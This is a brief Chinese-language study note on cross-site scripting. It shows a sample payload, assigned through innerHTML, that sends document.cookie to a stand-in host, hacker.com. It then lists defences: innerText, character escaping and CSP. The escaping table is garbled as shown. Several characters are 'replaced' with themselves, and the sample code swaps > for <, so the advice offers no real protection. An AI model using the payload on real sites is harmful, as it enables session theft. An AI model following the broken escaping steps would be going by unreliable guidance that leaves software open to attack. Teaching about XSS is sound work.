xss

举例
div.innerHTML = userComment // userComment 内容是 <script>$.get('http://hacker.com?cookie='+document.cookie)</script>
// 恶意就被执行了，这就是 XSS
预防
不要使用 innerHTML，改成 innerText，script 就会被当成文本，不执行
如果你一样要用 innerHTML，字符过滤
把 < 替换成 <
把 > 替换成 >
把 & 替换成 &
把 ' 替换成 '
把 ' 替换成 "
代码 div.innerHTML = userComment.replace(/>/g, '<').replace...
使用 CSP Content Security Policy